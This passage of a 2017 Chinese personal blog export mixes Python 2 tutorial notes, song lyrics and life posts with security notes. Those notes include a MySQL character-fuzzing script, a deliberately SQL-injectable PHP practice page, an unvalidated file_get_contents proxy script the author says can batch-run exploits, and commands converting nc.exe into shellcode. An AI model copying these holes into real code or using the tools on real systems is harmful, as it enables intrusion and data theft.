<p><a href="https://www.baidu.com/s?wd=wireshark%20%E6%95%99%E7%A8%8B" target="_blank" rel="external">https://www.baidu.com/s?wd=wireshark%20%E6%95%99%E7%A8%8B</a></p>
<p>```</p>
]]></content>
<tags>
<tag> tools </tag>
<tag> 网络安全 </tag>
</tags>
</entry>
<entry>
<title><![CDATA[python623]]></title>
<url>http://phpplay.github.io/2017/06/23/python623/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="格式输出与列表"><a href="#格式输出与列表" class="headerlink" title="格式输出与列表"></a>格式输出与列表</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div 
class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div><div class="line">129</div><div class="line">130</div><div class="line">131</div><div class="line">132</div><div class="line">133</div><div class="line">134</div><div class="line">135</div><div class="line">136</div><div class="line">137</div><div class="line">138</div><div class="line">139</div><div class="line">140</div><div class="line">141</div><div class="line">142</div><div class="line">143</div><div 
class="line">144</div><div class="line">145</div><div class="line">146</div></pre></td><td class="code"><pre><div class="line">格式输出</div><div class="line">%d 整数</div><div class="line">%f 浮点数</div><div class="line">%s 字符串</div><div class="line">%x 十六进制整数</div><div class="line"></div><div class="line">print 'whoami %d' %(1) #这个是整数1</div><div class="line">whoami 1</div><div class="line"></div><div class="line">print 'whoami %s' %('1') #这个是字符1</div><div class="line">whoami 1</div><div class="line"></div><div class="line">print 'whoami %f' % 1.00 这个是浮点1</div><div class="line">whoami 1.000000</div><div class="line"></div><div class="line">print 'whoami %x' %(1) 这个是十六进制整数1</div><div class="line">whoami 1</div><div class="line"></div><div class="line"></div><div class="line">list 列表</div><div class="line">定义并循环输出列表</div><div class="line">>>> whoami = ['diyi','dier','laosan']</div><div class="line">>>> whoami</div><div class="line">>>> for i in whoami:</div><div class="line">... print i</div><div class="line">...</div><div class="line">diyi</div><div class="line">dier</div><div class="line">laosan</div><div class="line"></div><div class="line"></div><div class="line">输出定位元素</div><div class="line">>>> whoami[0]</div><div class="line">'diyi'</div><div class="line">>>> whoami[2]</div><div class="line">'laosan'</div><div class="line">>>> whoami[1]</div><div class="line">'dier'</div><div class="line">>>> whoami[3]</div><div class="line">Traceback (most recent call last):</div><div class="line"> File "<stdin>", line 1, in <module></div><div class="line">IndexError: list index out of range</div><div class="line"></div><div class="line">>>> len(whoami)</div><div class="line">3</div><div class="line">>>> whoami[len(whoami)-1]</div><div class="line">'laosan'</div><div class="line"></div><div class="line">添加元素</div><div class="line">>>> whoami.append('xiaosi')</div><div class="line">>>> whoami</div><div class="line">['diyi', 'dier', 'laosan', 'xiaosi']</div><div 
class="line">插入元素</div><div class="line">>>> whoami.insert(2,'whoami')</div><div class="line">>>> whoami</div><div class="line">['diyi', 'dier', 'whoami', 'laosan', 'xiaosi']</div><div class="line">修改元素</div><div class="line">>>> whoami[2] = 'gai'</div><div class="line">>>> whoami</div><div class="line">['diyi', 'dier', 'gai', 'laosan', 'xiaosi']</div><div class="line">删除末尾元素</div><div class="line">>>> whoami.pop()</div><div class="line">'test'</div><div class="line">>>> whoami</div><div class="line">['diyi', 'dier', 'gai', 'laosan', 'xiaosi']</div><div class="line">删除指定元素</div><div class="line">>>> whoami.pop(2)</div><div class="line">'gai'</div><div class="line">>>> whoami</div><div class="line">['diyi', 'dier', 'laosan', 'xiaosi']</div><div class="line">嵌套取值</div><div class="line">>>> cn = whoami</div><div class="line">>>> mingzi = [cn,'en']</div><div class="line">>>> mingzi[0][2]</div><div class="line">'laosan'</div><div class="line"></div><div class="line">元组 tuple 元组中的值是不可变的 无法增删改</div><div class="line">>>> yuanzu = ('1','2','3')</div><div class="line">>>> yuanzu</div><div class="line">('1', '2', '3')</div><div class="line">>>> for i in yuanzu:</div><div class="line">... 
print i</div><div class="line">...</div><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">>>> yuanzu[0]</div><div class="line">'1'</div><div class="line">>>> yuanzu[0] = '2333'</div><div class="line">Traceback (most recent call last):</div><div class="line"> File "<stdin>", line 1, in <module></div><div class="line">TypeError: 'tuple' object does not support item assignment</div><div class="line">单一元组的时候必须加,来消除歧义,否则会误解为数学计算中的小括号</div><div class="line">>>> t=(1)</div><div class="line">>>> t</div><div class="line">1</div><div class="line">>>> t=(1,)</div><div class="line">>>> t</div><div class="line">(1,)</div><div class="line">>>> type(t)</div><div class="line"><type 'tuple'></div><div class="line">>>> t =(1)</div><div class="line">>>> type(t)</div><div class="line"><type 'int'></div><div class="line"></div><div class="line">tuple中有变量的时候,指向不变,但是有列表时就可以变化</div><div class="line">变量不变</div><div class="line">>>> z = 'a'</div><div class="line">>>> t = ('1','2',z)</div><div class="line">>>> t</div><div class="line">('1', '2', 'a')</div><div class="line">>>> z= 'b'</div><div class="line">>>> t</div><div class="line">('1', '2', 'a')</div><div class="line">列表变</div><div class="line">>>> t = ('1','2',['1','2'])</div><div class="line">>>> t</div><div class="line">('1', '2', ['1', '2'])</div><div class="line">>>> t[2][1] = '3'</div><div class="line">>>> t</div><div class="line">('1', '2', ['1', '3'])</div><div class="line"></div><div class="line">格式转换</div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line">------------------------------</div><div class="line">找到一个好东西</div><div class="line"></div><div class="line"></div><div class="line">int(x [,base ]) 将x转换为一个整数 </div><div class="line">long(x [,base ]) 将x转换为一个长整数 </div><div class="line">float(x ) 将x转换到一个浮点数 </div><div class="line">complex(real [,imag ]) 创建一个复数 </div><div class="line">str(x ) 将对象 x 
转换为字符串 </div><div class="line">repr(x ) 将对象 x 转换为表达式字符串 </div><div class="line">eval(str ) 用来计算在字符串中的有效Python表达式,并返回一个对象 </div><div class="line">tuple(s ) 将序列 s 转换为一个元组 </div><div class="line">list(s ) 将序列 s 转换为一个列表 </div><div class="line">chr(x ) 将一个整数转换为一个字符 </div><div class="line">unichr(x ) 将一个整数转换为Unicode字符 </div><div class="line">ord(x ) 将一个字符转换为它的整数值 </div><div class="line">hex(x ) 将一个整数转换为一个十六进制字符串 </div><div class="line">oct(x ) 将一个整数转换为一个八进制字符串</div></pre></td></tr></table></figure>
<h2 id="python-的-条件判断与循环"><a href="#python-的-条件判断与循环" class="headerlink" title="python 的 条件判断与循环"></a>python 的 条件判断与循环</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div></pre></td><td class="code"><pre><div class="line">与其它程序没有什么不同</div><div class="line">#-*- coding:utf-8 -*-</div><div class="line">a = int(raw_input('a='))</div><div class="line">#print type(a)</div><div class="line">if a > 0:</div><div class="line"> print '世界爆炸'</div><div class="line">elif a == 0:</div><div class="line"> print '世界战争'</div><div class="line">else:</div><div class="line"> print '世界和平'</div><div class="line"></div><div class="line">for循环 </div><div class="line">for i in list:</div><div class="line"> print i</div><div class="line"></div><div class="line">最经典的累加</div><div class="line">sum = 0</div><div class="line">for x in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]:</div><div class="line"> sum = sum + x</div><div class="line">print sum</div><div class="line"></div><div class="line">5050累加</div><div class="line">sum = 0</div><div class="line">for x in range(101):</div><div class="line"> sum = 
sum + x</div><div class="line">print sum</div><div class="line"></div><div class="line"></div><div class="line">奇数和的计算 while 的使用</div><div class="line">sum = 0</div><div class="line">n = 99</div><div class="line">while n > 0:</div><div class="line"> sum = sum + n</div><div class="line"> n = n - 2</div><div class="line">print sum</div></pre></td></tr></table></figure>
<h2 id="字典-dict"><a href="#字典-dict" class="headerlink" title="字典 dict"></a>字典 dict</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div 
class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div></pre></td><td class="code"><pre><div class="line">一个key只能对应一个value</div><div class="line"></div><div class="line">dict的key必须是不可变对象。</div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line">dict有以下几个特点:</div><div class="line"></div><div class="line">查找和插入的速度极快,不会随着key的增加而增加;</div><div class="line">需要占用大量的内存,内存浪费多。</div><div class="line"></div><div class="line">而list相反:</div><div class="line"></div><div class="line">查找和插入的时间随着元素的增加而增加;</div><div class="line">占用空间小,浪费内存很少。</div><div class="line"></div><div class="line">所以,dict是用空间来换取时间的一种方法。</div><div class="line"></div><div class="line"></div><div class="line">set</div><div class="line"></div><div class="line">字典中key是可以相同的,set的key却是不同的,但set不储存value</div><div class="line"></div><div 
class="line">set和dict类似,也是一组key的集合,但不存储value。</div><div class="line"></div><div class="line">由于key不能重复,所以,在set中,没有重复的key。</div><div class="line"></div><div class="line">重复元素会被过滤掉</div><div class="line"></div><div class="line">>>> s = set([1,1,1,1,1,1,1,1,22,2,2,2,2,2,3])</div><div class="line">>>> s</div><div class="line">set([1, 2, 3, 22])</div><div class="line">>>></div><div class="line"></div><div class="line">通过add(key)方法可以添加元素到set中,可以重复添加,但不会有效果:</div><div class="line"></div><div class="line">s.add(4)</div><div class="line"></div><div class="line">>>> s.add(5)</div><div class="line">>>> s</div><div class="line">set([1, 2, 3, 5, 22])</div><div class="line">set其实是无序的</div><div class="line"></div><div class="line">>>> s.add('234234')</div><div class="line">>>> s</div><div class="line">set([1, 2, 3, 5, 22, '234234'])</div><div class="line">>>></div><div class="line">>>> s.add(0) 添加0</div><div class="line">>>> s</div><div class="line">set([0, 1, 2, 3, 5, 22, '234234'])</div><div class="line">>>> s.add('') 添加空字符串</div><div class="line">>>> s</div><div class="line">set([0, 1, 2, 3, 5, '', 22, '234234'])</div><div class="line">>>></div><div class="line">>>> s.add() 添加空值是不可以的</div><div class="line">Traceback (most recent call last):</div><div class="line"> File "<stdin>", line 1, in <module></div><div class="line">TypeError: add() takes exactly one argument (0 given)</div><div class="line"></div><div class="line"></div><div class="line">s.remove(1)</div><div class="line"></div><div class="line"></div><div class="line">>>> s.remove(1) 删除元素,但是remove的值必须存在 </div><div class="line">>>> s</div><div class="line">set([0, 2, 3, 5, '', 22, '234234'])</div><div class="line"></div><div class="line"></div><div class="line">使用 discard 删除的话,.discard(obj)中的obj如果是set中的元素,就删除,如果不是,就什么也不做</div><div class="line"></div><div class="line">>>> s</div><div class="line">set(['a', 2, 3, 5, '', 7, 22, '234234', 989])</div><div class="line">>>> s.discard(234234234324)</div><div class="line">>>> 
s</div><div class="line">set(['a', 2, 3, 5, '', 7, 22, '234234', 989])</div><div class="line">>>> s.discard(22)</div><div class="line">>>> s</div><div class="line">set(['a', 2, 3, 5, '', 7, '234234', 989])</div><div class="line"></div><div class="line"></div><div class="line">set可以看成数学意义上的无序和无重复元素的集合,因此,两个set可以做数学意义上的交集、并集等操作:</div><div class="line"></div><div class="line"></div><div class="line">set([0, 2, 3, 5, '', 22, '234234'])</div><div class="line">>>> s.add(7)</div><div class="line">>>> s</div><div class="line">set([0, 2, 3, 5, '', 7, 22, '234234'])</div><div class="line">>>> s.add(989)</div><div class="line">>>> s</div><div class="line">set([0, 2, 3, 5, '', 7, 22, '234234', 989])</div><div class="line">>>> s.add('a')</div><div class="line">>>> s</div><div class="line">set([0, 'a', 2, 3, 5, '', 7, 22, '234234', 989])</div><div class="line">>>></div><div class="line">>>> s</div><div class="line">set([0, 'a', 2, 3, 5, '', 7, 22, '234234', 989])</div><div class="line">>>> b =set([2333,2,3,5,7])</div><div class="line">>>> s&b</div><div class="line">set([2, 3, 5, 7])</div><div class="line">>>> s |b</div><div class="line">set([0, 'a', 2, 3, 5, '', 7, 2333, 22, '234234', 989])</div><div class="line"></div><div class="line">>>> s1 = set("qiwsir")</div><div class="line">>>> s1 自动拆分字符</div><div class="line">set(['q', 'i', 's', 'r', 'w']) </div><div class="line"></div><div class="line">set.pop()是从set中任意选一个元素,删除并将这个值返回.但是,不能指定删除某个元素.</div><div class="line"></div><div class="line">从另外一个set中合并过来元素 使用 set.update update只能用于增加字符串 ,用于整数等类型就会报错</div><div class="line"></div><div class="line">>>> s1.update('whoami')</div><div class="line">>>> s1</div><div class="line">set(['a', 'i', 'h', 'm', 'o', 'q', 's', 'r', 'w'])</div><div class="line"></div><div class="line">set 最常用的地方应该就是交并集合 ,比较,或者统计了</div><div class="line"></div><div class="line">set.clear(),清空</div></pre></td></tr></table></figure>]]></content>
<tags>
<tag> python </tag>
</tags>
</entry>
<entry>
<title><![CDATA[php fuzz]]></title>
<url>http://phpplay.github.io/2017/06/15/php-fuzz/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="php-mysql-fuzz"><a href="#php-mysql-fuzz" class="headerlink" title="php mysql fuzz"></a>php mysql fuzz</h2><p>上周因为一个注入,让我又研究了一下fuzz方面的东西,所以从网上找了几个脚本,另外写了个批量检测的php脚本,现在记录下来。</p>
<p>第一个是对mysql的fuzz,主要测试的是chr函数的255个特殊字符放到mysql语句中会不会起到作用,这个脚本是网上找的,原文来自于wooyun zone,可惜了zone里一堆好东西现在都不见了啊。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div></pre></td><td class="code"><pre><div class="line"><?php</div><div class="line"> error_reporting(0);</div><div class="line"> /* 连接选择数据库 */</div><div class="line"> $link = mysql_connect("localhost", "root", "root123")</div><div class="line"> or die("Could not connect : " . 
mysql_error());</div><div class="line"> print "Connected successfully<br/><br />";</div><div class="line"> mysql_select_db("mysql") or die("Could not select database");</div><div class="line"></div><div class="line"> /* 执行 SQL 查询 */</div><div class="line"> for($i=0;$i<255;$i++){</div><div class="line"> $fuzz=chr($i);</div><div class="line"> $query = "{$fuzz}SELECT{$fuzz}{$fuzz}password{$fuzz}from{$fuzz} mysql.user {$fuzz}limit {$fuzz}1";</div><div class="line"> //$query = "SELECT 1 from mysql.user --{$fuzz}xxxxx";</div><div class="line"> $result = mysql_query($query);</div><div class="line"> $array = mysql_fetch_array($result,MYSQL_ASSOC);</div><div class="line"></div><div class="line"> /* 在 HTML 中打印结果 */</div><div class="line"> if(mysql_error()==''){</div><div class="line"> echo urlencode(chr($i))." ---- ".chr($i)."<br/>";</div><div class="line"> echo $query."<br />";</div><div class="line"> print_r($array);</div><div class="line"> echo "<br /><br />";</div><div class="line"> mysql_free_result($result);</div><div class="line"> }</div><div class="line"> </div><div class="line"> }</div><div class="line"> /* 释放资源 */</div><div class="line"> mysql_free_result($result);</div><div class="line"></div><div class="line"> /* 断开连接 */</div><div class="line"> mysql_close($link);</div><div class="line">?></div></pre></td></tr></table></figure></p>
<hr>
<h2 id="php-sql-injection"><a href="#php-sql-injection" class="headerlink" title="php sql injection"></a>php sql injection</h2><p>第二个脚本是用来练注入的,需要配置下数据库<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div></pre></td><td class="code"><pre><div class="line"><?php</div><div class="line"> $conn = mysql_connect("localhost", "root", "root123");</div><div class="line"> if(!$conn)</div><div class="line"> { </div><div class="line"> echo "数据库联接错误";</div><div class="line"> exit;</div><div class="line"> }</div><div class="line">if (!mysql_select_db("test")) </div><div class="line">{</div><div class="line"> echo "选择数据库出错" . mysql_error();</div><div class="line"> exit;</div><div class="line">}</div><div class="line">$tempID=$_GET['id'];</div><div class="line">if($tempID<=0 || !isset($tempID)) $tempID=1;</div><div class="line">$sql = "SELECT * FROM php_product WHERE id =$tempID";</div><div class="line">echo $sql.'<br>';</div><div class="line">$result = mysql_query($sql);</div><div class="line">if (!$result) {</div><div class="line">echo "查询出错" . 
mysql_error();</div><div class="line">exit;</div><div class="line">}</div><div class="line">if (mysql_num_rows($result) == 0) {</div><div class="line">echo "没有查询结果";</div><div class="line">exit;</div><div class="line">}</div><div class="line">while ($row = mysql_fetch_assoc($result)) {</div><div class="line"> echo 'ID:'.$row["id"].'<br>';</div><div class="line"> echo 'name:'.$row["name"].'<br>';</div><div class="line"> echo 'price:'.$row["price"].'<br>';</div><div class="line">echo 'image:'.$row["img"].'<br>';</div><div class="line">}</div><div class="line">?></div></pre></td></tr></table></figure></p>
<hr>
<h2 id="php-burp-geturl"><a href="#php-burp-geturl" class="headerlink" title="php burp geturl"></a>php burp geturl</h2><p>第三个脚本是自己写的,用来配合burp检测网站状态,也可用来批量执行exp等等,关键看自己怎么用了,很简单的东西,而且file_get_contents是有先天不足的(这里的$url直接取自$_GET["u"],没有校验协议,file_get_contents除了http地址外也会打开本地文件和其他stream wrapper),建议替换为其他函数<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line"><?php </div><div class="line">/*</div><div class="line">$url = "http://".$_GET["u"]; </div><div class="line">*/</div><div class="line">$url = $_GET["u"]; </div><div class="line">$ctx = stream_context_create(array( </div><div class="line">'http' => array('timeout' => 50, </div><div class="line">'proxy' => 'tcp://127.0.0.1:8080', </div><div class="line">'request_fulluri' => True,) </div><div class="line">) </div><div class="line">); </div><div class="line">$result = file_get_contents($url, false, $ctx); </div><div class="line">echo $result; </div><div class="line">?></div></pre></td></tr></table></figure></p>
<p>这只是初步的脚本,网上有更多好东西,度娘谷哥可以帮你。</p>
]]></content>
<tags>
<tag> web安全 </tag>
</tags>
</entry>
<entry>
<title><![CDATA[自定义shellcode]]></title>
<url>http://phpplay.github.io/2017/05/24/%E8%87%AA%E5%AE%9A%E4%B9%89shellcode/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><p>一直在找shellcode的生成工具,想过要自己写,但是又没个思路,直到今天才找到了自己想要的东西,没想到的是08年就有人写出来了。不过也对,当时全是研究底层的大神,和现在的学习环境都不一样。<br>怀念当年绿色兵团那时候的学习氛围,想起当年我也是拿手机上邪八,绿色的人啊。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">schelper.exe -i nc.exe -en Exe -db -o s.bin</div><div class="line"></div><div class="line">测试 : schelper.exe -t -i s.bin</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"></div><div class="line">schelper.exe -i nc.exe -d 1 -o s.txt</div><div class="line"></div><div class="line"></div><div class="line">成功生成shellcode</div></pre></td></tr></table></figure>
<p>下一步我要尝试学习delphi了,学习,学习,加油!</p>
]]></content>
<tags>
<tag> 网络安全 </tag>
<tag> shellcode </tag>
<tag> C </tag>
</tags>
</entry>
<entry>
<title><![CDATA[遥不可及的你]]></title>
<url>http://phpplay.github.io/2017/05/22/ni/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><p>遥不可及的你</p>
<p>–花粥</p>
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="520" height="81" src="//music.163.com/outchain/player?type=2&id=450853439&auto=1&height=66"></iframe>
<p>如果有一天我要去流浪</p>
<p>不是因为我厌倦了家乡</p>
<p>不是难忍这里冬天太长</p>
<p>而是我终于得知了你的方向</p>
<p>如果有一天我不再感伤</p>
<p>不是因为我突然的成长</p>
<p>不是有天有人向我递一颗糖</p>
<p>而是我终于走到了你的身旁</p>
<p>我从前相信</p>
<p>这世上有一个温暖的人</p>
<p>只为我悲喜</p>
<p>为我阻挡着人间的锋利</p>
<p>为了找到你</p>
<p>从未放过任何蛛丝马迹</p>
<p>而事到如今</p>
<p>终于明白我命里没你</p>
<p>我曾遇到许多美丽故事</p>
<p>也曾以为那些是你的名字</p>
<p>我的执迷不悟感动了我自己</p>
<p>你却还是一样遥不可及</p>
<p>所以我开始向往着远方</p>
<p>想去那些曾经有你的地方</p>
<p>可我未曾想过的人海茫茫</p>
<p>让我没日没夜迷失方向</p>
<p>我从前相信</p>
<p>这世上有一个温暖的人</p>
<p>只为我悲喜</p>
<p>为我阻挡着人间的锋利</p>
<p>为了找到你</p>
<p>从未放过任何蛛丝马迹</p>
<p>而事到如今</p>
<p>终于明白我命里没你</p>
<p>我从前相信</p>
<p>这世上有一个温暖的人</p>
<p>只为我悲喜</p>
<p>为我阻挡着人间的锋利</p>
<p>为了找到你</p>
<p>从未放过任何蛛丝马迹</p>
<p>而事到如今</p>
<p>终于明白我命里没你</p>
<p>wo zai zhe li a , ni you zai na li ?</p>
]]></content>
<tags>
<tag> 生活 </tag>
</tags>
</entry>
<entry>
<title><![CDATA[祝天下有情人终成兄妹]]></title>
<url>http://phpplay.github.io/2017/05/20/%E6%84%BF%E5%A4%A9%E4%B8%8B%E6%9C%89%E6%83%85%E4%BA%BA%E7%BB%88%E6%88%90%E5%85%84%E5%A6%B9/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><p>先来一个我喜欢的up主的视频,看得我都想谈恋爱了,我Jay威武!北京巡回演唱会不知道有没有人组团去啊!!!</p>
<embed height="415" width="544" quality="high" allowfullscreen="true" type="application/x-shockwave-flash" src="//static.hdslb.com/miniloader.swf" flashvars="aid=10672935&page=1" pluginspage="//www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash">
<p>再来个虐狗的 - - , 有没有人被暴击到?</p>
<embed height="415" width="544" quality="high" allowfullscreen="true" type="application/x-shockwave-flash" src="//static.hdslb.com/miniloader.swf" flashvars="aid=8709991&page=1" pluginspage="//www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash">
<p>最后祝天下有情人,终成兄妹</p>
]]></content>
<tags>
<tag> 生活 </tag>
</tags>
</entry>
<entry>
<title><![CDATA[python运算符笔记]]></title>
<url>http://phpplay.github.io/2017/05/12/python%E8%BF%90%E7%AE%97%E7%AC%A6/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div 
